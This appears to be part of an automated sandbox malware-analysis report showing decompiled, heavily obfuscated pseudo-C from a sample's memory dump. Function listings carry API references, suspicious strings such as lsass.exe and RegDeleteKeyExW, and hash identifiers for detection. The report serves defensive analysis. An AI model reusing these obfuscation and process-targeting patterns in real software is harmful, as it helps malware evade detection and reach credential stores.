                      Function 00480FC9 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 253libraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 15%
                      			E00480FC9(intOrPtr __ebx, signed int __edi, void* __esi) {
				_Unknown_base(*)()* _t70;
				_Unknown_base(*)()* _t78;
				signed int _t81;
				_Unknown_base(*)()* _t85;
				_Unknown_base(*)()* _t90;
				char* _t93;
				char _t96;
				unsigned short _t111;
				unsigned short _t112;
				char* _t119;
				intOrPtr _t123;
				void* _t145;
				void* _t147;
				short _t151;
				intOrPtr _t157;
				short _t163;
				unsigned short _t164;
				unsigned short _t165;
				signed char _t168;
				signed int _t170;
				signed int _t171;
				signed int _t179;
				void* _t181;
				void* _t184;
				void* _t189;
				void* _t190;

				_t184 = __esi;
				_t179 = __edi;
				_push( *0x509062);
				 *(_t190 - 0x1c) =  *(_t190 - 0x1c) - __ebx;
				 *((intOrPtr*)(_t190 - 0x14)) = __ebx;
				 *(_t190 - 0xc) = "api-ms-win-core-localization-l1-1-0.dll";
				_push( *0x509204);
				 *0x509168 = 0x61b4;
				 *0x50bf0a =  *0x50bf0a + 0x1d9c03;
				 *0x50911e =  *0x50911e + 0xfffffffffffffde9;
				_t70 =  *(_t190 - 8);
				_push( *0x5090ec);
				if(0 <= 0) {
					 *0x50916e = 0;
					if(0 >= 0) {
						_t163 =  *0x5091ba; // 0x1ef3
						 *0x509208 = _t163;
					}
				}
				_push( *0x50902c);
				 *0x50a758 =  *0x50a758 - _t163;
				_t164 = _t163 - 0x909fe5;
				if((_t184 - 0x00abf90e & 0x0000a923) >= 0) {
					 *0x50bf13 = _t70;
				}
				_t181 = (_t179 | 0x00c931f7) + (_t179 | 0x00c931f7);
				 *(_t190 - 8) = _t70;
				_t194 = _t70 - 0x2426;
				if(_t70 > 0x2426) {
				}
				 *0x50918c = 0x6b1b;
				_push( *0x509174);
				 *0x509144 = 0x6b1b;
				_t111 = "RegDeleteKeyExW";
				 *0x5090fc =  *0x5090fc + _t111;
				_t145 = 0x68;
				_t165 = _t164 >> 0x68;
				 *(_t190 - 8) = E005002EA(_t111, 0x68, _t165, _t181, _t194);
				_t78 =  *(_t190 - 8);
				_t112 = _t111 >> 0x68;
				if(_t112 > 0x3818) {
					if(_t112 <= _t112) {
						 *0x50bf0c =  *0x50bf0c + _t112;
					}
					_t145 = 0x772c;
					 *0x50919c =  *0x50919c - _t165;
					 *0x5091b2 =  *0x5091b2 - _t165;
				}
				 *0x50bf13 =  *0x50bf13 - _t78;
				_t189 = 0xc604;
				if(0 >= 0) {
					 *0x50bf15 =  *0x50bf15 - _t78;
				}
				 *0x50bf07 =  *0x50bf07 + _t78;
				_t119 = "WSManHTTPConfig.exe";
				 *(_t190 - 0x1c) = _t119;
				 *(_t190 - 0x58) = _t78;
				_t147 = _t145 + 0x73 - 1;
				 *0x5091d6 = 0xaf7f;
				_t168 =  *0x50920a; // 0x9991
				 *(_t190 - 8) = _t78;
				if(_t78 != 0x1c) {
					L16:
					_t147 = 0x6a89;
					goto L17;
				} else {
					_t119 = 0x3c3181;
					if(0x3c3181 < 0x3c3181) {
						L17:
						 *((intOrPtr*)(_t190 - 0x2c)) =  *((intOrPtr*)(_t190 - 0x2c)) + _t147;
						_push( *(_t190 - 0x58));
						_t81 = "api-ms-win-core-localization-l1-1-0.dll" + "api-ms-win-core-localization-l1-1-0.dll";
						if(_t119 <= 0x2d8d) {
							L22:
							 *0x509358 =  *0x509358 - _t181;
							_t81 = _t81 + _t81;
							L23:
							E00509584 = _t81;
							 *((intOrPtr*)(_t190 - 0x14)) =  *((intOrPtr*)(_t190 - 0x14)) + _t119;
							 *(_t190 - 0x18) = _t119;
							 *0x509166 = 0x65c9;
							_t151 =  *0x509196; // 0x5fe2
							_t170 =  !(_t168 - 1);
							_t85 =  *(_t190 - 8);
							_push( *0x5093d4);
							 *0x50bf15 = _t85;
							_t123 =  *0x50bf17; // -1
							 *(_t190 - 8) = _t85;
							if(_t85 > 0x16734f) {
								L28:
								 *((intOrPtr*)(_t190 - 0x14)) = _t123;
								L29:
								 *((intOrPtr*)(_t190 - 0x20)) =  *((intOrPtr*)(_t190 - 0x20)) - 0x41d0bc;
								 *0x50913c = _t151;
								_t171 =  !_t170;
								_t90 = GetProcAddress(??, ??);
								 *0x509226 = _t171;
								 *(_t190 - 8) = _t90;
								_t93 = "RtlReleaseRelativeName";
								if(0x8093 >> 0x8093 >= 0x8093 >> 0x8093) {
									 *0x50a77c =  *0x50a77c + _t171;
									 *0x5091da = _t171;
									_t189 = _t189 - 0xb9da;
								}
								 *0x50bf13 = _t93;
								_push(_t189);
								_push(E004813AB);
								_push(L00468BBD);
								return _t93;
							}
							if(_t123 + 0x39 != _t123 + 0x39) {
								goto L29;
							}
							_t123 =  *((intOrPtr*)(_t190 - 0x20));
							_t151 = 0x5ffd;
							 *((intOrPtr*)(_t190 - 0x24)) =  *((intOrPtr*)(_t190 - 0x24)) - 0x5ffd;
							 *0x5091ea =  *0x5091ea + 0x8f4c;
							_t170 = 0x11e98 + _t189;
							if(_t189 >= 0) {
							}
							_t96 =  *0x50bf15; // 0x0
							 *0x50bf07 = _t96;
							goto L28;
						}
						if(_t119 > 0x3e) {
							 *(_t190 - 0x18) =  &(( *(_t190 - 0x18))[_t119]);
							 *(_t190 - 0x1c) = _t119;
						}
						_t157 =  *0x509146; // 0x380
						 *0x509192 =  *0x509192 - _t157 - 0x7482;
						if((_t168 & 0x0000008e) > 0) {
							goto L23;
						} else {
							_t168 = _t168 + 0x9bee;
							 *0x50bf12 =  *0x50bf12 - _t168;
							_t81 = 0xcf;
							goto L22;
						}
					}
					_t119 = 0;
					goto L16;
				}
			}





























                      0x00480fc9
                      0x00480fc9
                      0x00480fe4
                      0x00480feb
                      0x00481003
                      0x00481011
                      0x00481019
                      0x00481023
                      0x00481032
                      0x00481045
                      0x00481055
                      0x00481058
                      0x00481062
                      0x00481069
                      0x00481073
                      0x00481075
                      0x0048107c
                      0x0048107c
                      0x00481073
                      0x00481091
                      0x00481098
                      0x004810a1
                      0x004810ac
                      0x004810ae
                      0x004810ae
                      0x004810c2
                      0x004810d5
                      0x004810d8
                      0x004810dc
                      0x004810dc
                      0x004810f7
                      0x004810fe
                      0x00481106
                      0x0048111c
                      0x00481121
                      0x0048112e
                      0x00481132
                      0x0048113a
                      0x00481142
                      0x00481145
                      0x0048114d
                      0x00481152
                      0x00481154
                      0x00481154
                      0x00481164
                      0x00481168
                      0x0048116f
                      0x00481178
                      0x00481181
                      0x00481189
                      0x00481190
                      0x00481192
                      0x00481192
                      0x0048119e
                      0x004811b1
                      0x004811b6
                      0x004811bb
                      0x004811c1
                      0x004811c8
                      0x004811d2
                      0x004811d9
                      0x004811de
                      0x004811fb
                      0x004811fb
                      0x00000000
                      0x004811e0
                      0x004811e8
                      0x004811f0
                      0x004811ff
                      0x004811ff
                      0x00481208
                      0x00481213
                      0x0048121a
                      0x00481255
                      0x00481255
                      0x0048125e
                      0x00481265
                      0x00481265
                      0x00481274
                      0x00481277
                      0x00481287
                      0x00481290
                      0x00481298
                      0x0048129a
                      0x0048129d
                      0x004812a3
                      0x004812aa
                      0x004812b0
                      0x004812b8
                      0x00481306
                      0x00481313
                      0x00481318
                      0x0048131d
                      0x00481320
                      0x00481333
                      0x00481338
                      0x0048133e
                      0x0048134d
                      0x00481356
                      0x00481370
                      0x0048137d
                      0x00481383
                      0x00481394
                      0x00481394
                      0x00481399
                      0x0048139f
                      0x004813a0
                      0x004813a5
                      0x004813aa
                      0x004813aa
                      0x004812c5
                      0x00000000
                      0x00000000
                      0x004812c9
                      0x004812cc
                      0x004812d0
                      0x004812e3
                      0x004812ec
                      0x004812f1
                      0x004812f1
                      0x004812fb
                      0x00481301
                      0x00000000
                      0x00481301
                      0x0048121f
                      0x00481221
                      0x00481224
                      0x00481224
                      0x0048122a
                      0x00481236
                      0x00481242
                      0x00000000
                      0x00481244
                      0x00481244
                      0x00481249
                      0x00481253
                      0x00000000
                      0x00481253
                      0x00481242
                      0x004811f2
                      0x00000000
                      0x004811f4

                      APIs
                      • GetProcAddress.KERNEL32(?), ref: 00481338
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: >-,$CNBP_335.DLL$G.V$RegDeleteKeyExW$RtlReleaseRelativeName$WSManHTTPConfig.exe$WinFax.dll$api-ms-win-core-localization-l1-1-0.dll
                      • API String ID: 190572456-1177868353
                      • Opcode ID: 8cfc005012e1424f2955b15eeae255cf75781ce83cba4fb95b67d95038e86652
                      • Instruction ID: cde278d05ffd1799fe818271f52062a44ccea0e1f1d6747cc6b1ae7a1711a1a4
                      • Opcode Fuzzy Hash: 8cfc005012e1424f2955b15eeae255cf75781ce83cba4fb95b67d95038e86652
                      • Instruction Fuzzy Hash: 01A1D075E142479BDB00EFB9EC982CD7BB1FB3D310B44886AD844E7726E2340A49EB55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004809E9 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 194libraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 35%
                      			E004809E9() {
				signed int _t38;
				signed int _t40;
				signed int _t53;
				signed int _t56;
				signed int _t59;
				void* _t70;
				signed int _t76;
				char* _t77;
				char* _t89;
				char* _t92;
				signed char _t107;
				signed int _t108;
				short _t121;
				signed int _t122;
				intOrPtr _t126;
				void* _t129;
				unsigned short _t132;
				void* _t136;

				 *(_t136 - 8) = _t38;
				if(_t38 < 0x13fd77) {
					L3:
					_t122 = 0xffffffffff54502c;
					 *0x50b652 =  *0x50b652 + 0xac3c62;
					L4:
					_t40 =  *(_t136 - 8);
					 *(_t136 - 0x58) = _t40;
					if(_t129 == 0) {
						 *0x509036 =  *0x509036 - _t40;
						 *0x50904c =  *0x50904c + _t40;
						if(_t40 < 0x2b13fc) {
							_t121 =  *0x509134; // 0x0
							 *0x509180 = _t121;
							_t107 = _t121 + _t122;
						}
						_t122 =  !0x9687;
					}
					_t124 = _t122 ^ 0x0000ae2e;
					 *0x50bf14 = _t40;
					_t70 = 0xc9 - _t40;
					_t132 = 0xdbdc73;
					 *0x5094bc = _t40;
					if(_t40 <= 0x19) {
						 *(_t136 - 0x14) =  !(_t70 - 0x21);
					}
					if(0x484ce4 == _t107) {
						_t107 = 0x7feb;
						_t124 = _t124;
					}
					_push( *(_t136 - 0x58));
					if((_t124 & 0x007abc92) == 0) {
						if((_t124 & 0x000090bc) < 0) {
							 *0x50bf12 = _t40;
						}
						_t132 = _t132 >> _t107;
					}
					_t76 = _t40 - _t40 - 0x1fbf15;
					 *0x5090a2 =  *0x5090a2 + _t76;
					 *(_t136 - 0x14) = _t76;
					_t77 = _t76 - 0x4a2ca2;
					_t108 = 0x6278;
					 *0x50915a = 0x6278;
					_push( *0x5093d4);
					 *(_t136 - 8) = _t40;
					if(_t40 > 0x15b7) {
						L19:
						_t108 = _t108 - 0x5e;
						goto L20;
					} else {
						if(_t77 >= 0x36d59a) {
							L20:
							 *0x50917a = _t108;
							 *(_t136 - 8) = GetProcAddress(??, ??);
							 *0x509152 =  !_t108;
							_t53 =  *(_t136 - 8);
							if(0x68be >= 0x68be) {
								_t126 =  *0x5091d4; // 0x8851
								_t124 = _t126 - 1;
								 *0x50bf12 = _t53;
							}
							 *(_t136 - 8) = _t53;
							_t56 =  *(_t136 - 8);
							 *0x50983c = _t56;
							if(_t56 < 0) {
								 *0x509606 =  *0x509606 - 0xac3c62;
								 *0x50bf15 = _t56;
							}
							 *0x50bf07 =  *0x50bf07 - _t56;
							 *0x50bf09 =  *0x50bf09 + _t56;
							_t89 = "IMCCPHR.exe";
							 *(_t136 - 0x18) = _t89;
							 *(_t136 - 8) = _t56;
							 *(_t136 - 0x10) =  &(_t89[ *(_t136 - 0x10)]);
							_t59 =  *(_t136 - 8);
							 *0x50912e = 0x68be;
							 *(_t136 - 8) = _t59;
							 *(_t136 - 0xc) =  !_t59;
							_t92 = 0x311fed;
							 *(_t136 - 0x18) = 0x311fed;
							_push(0);
							 *0x50bf0e =  *0x50bf0e - 0x6fd462;
							 *0x50914e = 0;
							_push("lsass.exe");
							L00468BBD("lsass.exe", _t124);
							if(0x311fed != 0x32ffac) {
								_t92 = 0x412430;
							}
							L00468197(_t92, _t132, 0xac3c62, 0, _t92);
							_push(0x7ec7);
							_push(0);
							_push(E00480CB7);
							goto __ecx;
						}
						 *(_t136 - 0x18) = _t77;
						goto L19;
					}
				}
				_t38 =  *(_t136 - 0x10);
				 *0x5090c6 =  *0x5090c6 + 0x29343d;
				_t107 =  *0x509112; // 0x7d
				if(_t107 == _t107) {
					goto L4;
				}
				 *0x509162 = _t107;
				_t107 =  *0x5091ac; // 0xa184
				goto L3;
			}





















                      0x004809e9
                      0x004809f1
                      0x00480a24
                      0x00480a2b
                      0x00480a31
                      0x00480a39
                      0x00480a3b
                      0x00480a3e
                      0x00480a44
                      0x00480a4c
                      0x00480a53
                      0x00480a61
                      0x00480a6e
                      0x00480a75
                      0x00480a7c
                      0x00480a7c
                      0x00480a85
                      0x00480a85
                      0x00480a87
                      0x00480a95
                      0x00480a9e
                      0x00480aa0
                      0x00480aa6
                      0x00480aad
                      0x00480ab4
                      0x00480ab4
                      0x00480ac1
                      0x00480ac7
                      0x00480acb
                      0x00480acb
                      0x00480ad3
                      0x00480adc
                      0x00480ae3
                      0x00480ae5
                      0x00480af4
                      0x00480afa
                      0x00480afc
                      0x00480b0c
                      0x00480b12
                      0x00480b19
                      0x00480b1e
                      0x00480b24
                      0x00480b28
                      0x00480b2f
                      0x00480b35
                      0x00480b3c
                      0x00480b53
                      0x00480b56
                      0x00000000
                      0x00480b3e
                      0x00480b4c
                      0x00480b58
                      0x00480b58
                      0x00480b6b
                      0x00480b9c
                      0x00480bb5
                      0x00480bca
                      0x00480bce
                      0x00480bd5
                      0x00480bd6
                      0x00480bd6
                      0x00480bdc
                      0x00480be4
                      0x00480be7
                      0x00480bf0
                      0x00480bf2
                      0x00480bf9
                      0x00480c06
                      0x00480c0c
                      0x00480c12
                      0x00480c20
                      0x00480c25
                      0x00480c28
                      0x00480c32
                      0x00480c3f
                      0x00480c42
                      0x00480c54
                      0x00480c59
                      0x00480c5e
                      0x00480c66
                      0x00480c69
                      0x00480c6b
                      0x00480c71
                      0x00480c8b
                      0x00480c8c
                      0x00480c99
                      0x00480c9b
                      0x00480c9b
                      0x00480ca3
                      0x00480ca8
                      0x00480ca9
                      0x00480cab
                      0x00480cb5
                      0x00480cb5
                      0x00480b4e
                      0x00000000
                      0x00480b4e
                      0x00480b3c
                      0x004809f3
                      0x004809fb
                      0x00480a07
                      0x00480a11
                      0x00000000
                      0x00000000
                      0x00480a13
                      0x00480a1d
                      0x00000000

                      APIs
                      • GetProcAddress.KERNEL32(?), ref: 00480B65
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: =4)$CNBP_335.DLL$CoLockObjectExternal$G`}$IMCCPHR.exe$Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll$X3$lsass.exe
                      • API String ID: 190572456-3141691440
                      • Opcode ID: 1ed13258bbc3e5ebc3b8781ae8fb57ab9b8b45977072918cc2a5e31e55fc9b63
                      • Instruction ID: 8d17de4f1b9cb3e0de6bd03c796a4f9922a3c32b0896c727da71466e6710d8bf
                      • Opcode Fuzzy Hash: 1ed13258bbc3e5ebc3b8781ae8fb57ab9b8b45977072918cc2a5e31e55fc9b63
                      • Instruction Fuzzy Hash: E171AEB5B143469BDB00EFB9E8D96DE7BB0EB39310F04882AD944D7366E3780949DB44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004D598F Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 183COMMON
                      Download Yara Rule
                      C-Code - Quality: 63%
                      			E004D598F(int __eax, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				int _t36;
				int _t38;
				int _t39;
				int _t44;
				int _t50;
				int _t61;
				int _t62;
				signed int _t77;
				signed int _t78;
				void* _t79;
				intOrPtr _t83;
				signed int _t89;
				signed short _t119;
				short _t120;
				intOrPtr _t121;
				signed int _t129;
				void* _t131;
				void* _t132;
				void* _t133;
				void* _t134;

				_t131 = __esi;
				_t129 = __edi - 0xef1e;
				 *(_t134 - 8) = __eax;
				 *0x50913e =  *0x50913e - __ecx;
				_t36 =  *(_t134 - 8);
				 *0x5097f0 = _t36;
				 *(_t134 - 8) = _t36;
				 *(_t134 - 8) = _t36;
				E004ACA72(0x1221c5, 0x84, __esi, 1, 0x1255c0, 0);
				_t38 =  *(_t134 - 8);
				 *0x50bf0f =  *0x50bf0f - 0x84;
				 *0x50920e =  *0x50920e - 0xa25d;
				_t132 = _t131 + 0xade771;
				if(_t132 < 0) {
					 *0x50bf15 = _t38;
					if(_t38 >= 0) {
						_t129 = _t129 + 1;
					}
					 *0x509554 = _t38;
				}
				 *0x50bf0a =  *0x50bf0a - _t38;
				 *(_t134 - 0x28) = _t38;
				 *(_t134 - 8) = _t38;
				 *0x509cd4 =  *0x509cd4 - 0x316e66;
				_t39 =  *(_t134 - 8);
				_t119 =  *0x5091b0; // 0x1
				if((_t119 & 0x00008dd8) >= 0) {
				}
				_t120 =  *0x509234; // 0x0
				 *(_t134 - 8) = _t39;
				if(0xc0 > 0x39) {
					L9:
					_t132 = _t132 + 0xb8b930;
					 *0x50bf15 = 0;
					_t129 = _t129 + 0x00000001 & 0x00d50239;
					 *0x50978c =  *0x50978c + 0xff2da;
					_t77 = 0x3a6067;
					 *0x50bf0c =  *0x50bf0c + 0x3a6067;
					goto L10;
				} else {
					_t77 = "CNBP_335.DLL";
					if(0x50000a >= 0) {
						L10:
						_t44 =  *(_t134 - 8);
						if( *(_t134 - 0x28) == 0) {
							_t78 = _t77 + 0xef;
							 *(_t134 - 8) = _t44;
							if(_t78 <= 0x2efd) {
								L19:
								 *0x509180 = 0x6739;
								_t121 =  *0x5091b2; // 0x23e0
								_t122 = _t121 - 0x9688;
								 *0x50921e = _t121 - 0x9688;
								_t133 = _t132;
								 *0x50bf14 = 0xc1;
								_t79 = _t78 - 0xa;
								_t50 = InternetCloseHandle( *(_t134 - 0x24));
								 *(_t134 - 8) = _t50;
								E004BE19A(_t50, _t122, _t129, _t133, _t79 - 0x26d200, 1, _t79 - 0x26d200);
								_push(0);
								_push(1);
								_push(E004D747D);
								goto __ebx;
							}
							_t83 =  *0x509ccc; // 0x0
							 *((intOrPtr*)(_t134 - 0xc)) =  *((intOrPtr*)(_t134 - 0xc)) + _t83;
							 *0x5091ca = _t120;
							 *0x50bf12 =  *0x50bf12 - _t44;
							 *0x50bf13 =  *0x50bf13 + _t44;
							_t132 = _t132 + _t132;
							if(_t132 < 0) {
								 *0x50bf15 = _t44;
							}
							_t78 = _t83 + 0x00000038 >> 0x00007dd5 ^ 0x00475dae;
							goto L19;
						}
						 *(_t134 - 8) = _t44;
						L00468D9F(_t77, _t120, _t129, _t132, _t77, _t77);
						 *0x5091aa = _t120;
						_t61 =  *(_t134 - 8);
						_t89 =  !( !("WinFax.dll"));
						 *(_t134 - 8) = _t61;
						if(_t61 <= 0x2a45b3 && _t89 > 0x3157f5) {
							_t89 = 0x3f7c7a;
							 *0x50bf0c =  *0x50bf0c - 0x3f7c7a;
						}
						_t62 =  *(_t134 - 8);
						 *((intOrPtr*)(_t134 - 0x3c)) = 4;
						 *(_t134 - 8) = _t62;
						_push(_t89);
						_push(E004D5B7F);
						_push(E004AE40E);
						return _t62;
					}
					_t120 = 0xae6d;
					 *0x509252 =  *0x509252 - _t132;
					goto L9;
				}
			}























                      0x004d598f
                      0x004d5991
                      0x004d5996
                      0x004d59aa
                      0x004d59b9
                      0x004d59c1
                      0x004d59c6
                      0x004d59c9
                      0x004d59d6
                      0x004d59dd
                      0x004d59eb
                      0x004d59fe
                      0x004d5a09
                      0x004d5a12
                      0x004d5a14
                      0x004d5a1b
                      0x004d5a1f
                      0x004d5a1f
                      0x004d5a20
                      0x004d5a25
                      0x004d5a2d
                      0x004d5a33
                      0x004d5a36
                      0x004d5a3e
                      0x004d5a4d
                      0x004d5a56
                      0x004d5a62
                      0x004d5a62
                      0x004d5a67
                      0x004d5a76
                      0x004d5a7c
                      0x004d5ab7
                      0x004d5ab9
                      0x004d5ac0
                      0x004d5ac5
                      0x004d5ad6
                      0x004d5ae0
                      0x004d5ae5
                      0x00000000
                      0x004d5a7e
                      0x004d5a83
                      0x004d5a9a
                      0x004d5aed
                      0x004d5af2
                      0x004d5af9
                      0x004d73a7
                      0x004d73aa
                      0x004d73b2
                      0x004d740e
                      0x004d7419
                      0x004d7420
                      0x004d7427
                      0x004d742c
                      0x004d7433
                      0x004d7437
                      0x004d744c
                      0x004d744f
                      0x004d745b
                      0x004d7462
                      0x004d746d
                      0x004d746f
                      0x004d7471
                      0x004d747b
                      0x004d747b
                      0x004d73b4
                      0x004d73ba
                      0x004d73c7
                      0x004d73d8
                      0x004d73de
                      0x004d73e4
                      0x004d73e9
                      0x004d73eb
                      0x004d73f9
                      0x004d7408
                      0x00000000
                      0x004d7408
                      0x004d5b03
                      0x004d5b08
                      0x004d5b22
                      0x004d5b38
                      0x004d5b3b
                      0x004d5b3d
                      0x004d5b45
                      0x004d5b4f
                      0x004d5b54
                      0x004d5b54
                      0x004d5b66
                      0x004d5b69
                      0x004d5b70
                      0x004d5b73
                      0x004d5b74
                      0x004d5b79
                      0x004d5b7e
                      0x004d5b7e
                      0x004d5aac
                      0x004d5ab0
                      0x00000000
                      0x004d5ab0

                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID:
                      • String ID: 5Q$CNBP_335.DLL$G.V$WinFax.dll$api-ms-win-core-string-l1-1-0.dll$fn1$g`:$z|?
                      • API String ID: 0-335918231
                      • Opcode ID: 9e9849a5f38a35fd0368e593e17e189eddad15fc9dc9b9ae8512c0561558d25b
                      • Instruction ID: 1e1be77c086b0c4f02cbaec73922c542dec37d364461c3c5bcae04dc0e8bbd2b
                      • Opcode Fuzzy Hash: 9e9849a5f38a35fd0368e593e17e189eddad15fc9dc9b9ae8512c0561558d25b
                      • Instruction Fuzzy Hash: 3C61FF76A106469FEB01DFB9DCE86CE3BB1EB39300F08846AD90597367E3740948DB54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004B41A7 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 174COMMON
                      Download Yara Rule
                      APIs
                      • GetSystemDirectoryW.KERNEL32(?), ref: 004B4207
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: DirectorySystem
                      • String ID: B%<$CNBP_335.DLL$System.Net.Primitives.dll$aaclient.dll$activeds.dll$api-ms-win-core-localization-l1-1-0.dll$mscpxl32.dLL$normaliz.dll
                      • API String ID: 2188284642-340904649
                      • Opcode ID: 046f56a1c164722a65e7e98be1aed20da271b6c44e9072a48e0085f1c3ae910a
                      • Instruction ID: 21789b6ff1abf36875bbe46abc2444efe5c901f9e8a8573e0754ed502fe09bdc
                      • Opcode Fuzzy Hash: 046f56a1c164722a65e7e98be1aed20da271b6c44e9072a48e0085f1c3ae910a
                      • Instruction Fuzzy Hash: 4A518F79E0020A9BCF00EFB8D8D52CDBBB0FB29314F4084AAE945E7756E3740A45DB54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004E7817 Relevance: 15.2, APIs: 1, Strings: 9, Instructions: 157COMMON
                      Download Yara Rule
                      APIs
                      • SetLastError.KERNEL32(0000007F), ref: 004E79BF
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: ErrorLast
                      • String ID: &0$.e7$0Lqt:P$CoLockObjectExternal$G`}$PKQ$SetMagnificationDesktopColorEffect$mscpxl32.dLL$ucmhc.dll
                      • API String ID: 1452528299-447824498
                      • Opcode ID: 2b77ac974f53356bbf22024d26a9b411d7e11fe0bc1623984851f5005d0ca099
                      • Instruction ID: 089a12e55f3b11d473d2c91a9b7992e819e103c491e832e360421f7ed61f2cb1
                      • Opcode Fuzzy Hash: 2b77ac974f53356bbf22024d26a9b411d7e11fe0bc1623984851f5005d0ca099
                      • Instruction Fuzzy Hash: 5F518D74F542469FDB00DFB9E8D86CD7FB0EB3A320F1844AA99559B352E3750A48DB04
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004A9502 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 259COMMON
                      Download Yara Rule
                      APIs
                      • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),?), ref: 004A96E7
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: InformationToken
                      • String ID: MapUserPhysicalPages$Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll$NtSetDriverEntryOrder$RegDeleteKeyExW$RtlReleaseRelativeName$V9*$`}
                      • API String ID: 4114910276-847587667
                      • Opcode ID: cf049f001fbfecc03f03871f2a8e2154ab51edc1ca7eb29fb5091be49466b5f8
                      • Instruction ID: f37c0f5678ec6adf7b7eda2f065c65cd1ca6b55983c863394ed10f3c69c967b6
                      • Opcode Fuzzy Hash: cf049f001fbfecc03f03871f2a8e2154ab51edc1ca7eb29fb5091be49466b5f8
                      • Instruction Fuzzy Hash: 8EA1D076E142469BDB00DFB9DC951CD7BB1EF3A320F04816AC849A7726E3390A49DB45
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004DCDA0 Relevance: 13.7, APIs: 1, Strings: 8, Instructions: 167sleepCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: Sleep
                      • String ID: CoLockObjectExternal$MapUserPhysicalPages$NtSetDriverEntryOrder$networkitemfactory.dll$normaliz.dll$ucmhc.dll$x$`}
                      • API String ID: 3472027048-3320159137
                      • Opcode ID: 31ed1d5db19d46630caac47afb4f036ce7dc3cc8c746486a72b1bcc219a2ff00
                      • Instruction ID: e8c6f23c0a449912f037e57a8cdb7e84648bab0fd253c3be11187aa4da524487
                      • Opcode Fuzzy Hash: 31ed1d5db19d46630caac47afb4f036ce7dc3cc8c746486a72b1bcc219a2ff00
                      • Instruction Fuzzy Hash: C451BDB5A152069FDB00DFB4DCE46DD7BB0EB79314F08416AC944A77A6E3380A89EB44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004DCB35 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 197sleepthreadCOMMON
                      Download Yara Rule
                      APIs
                      • TerminateThread.KERNEL32(?,00000000), ref: 004DCC75
                      • Sleep.KERNEL32(000003E8), ref: 004DCFA5
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: SleepTerminateThread
                      • String ID: CNBP_335.DLL$G.V$WSManHTTPConfig.exe$ucmhc.dll$`}
                      • API String ID: 480259992-2780909559
                      • Opcode ID: 246d1772fc066ace8d7c1e5dcbbcb5dd0bc2aae0014cf6080e8473ba49b9ba49
                      • Instruction ID: e2dbd6b54c3cfd99d0f622891ce59f0236c9e01660c82b7a13874f3eb7a9756a
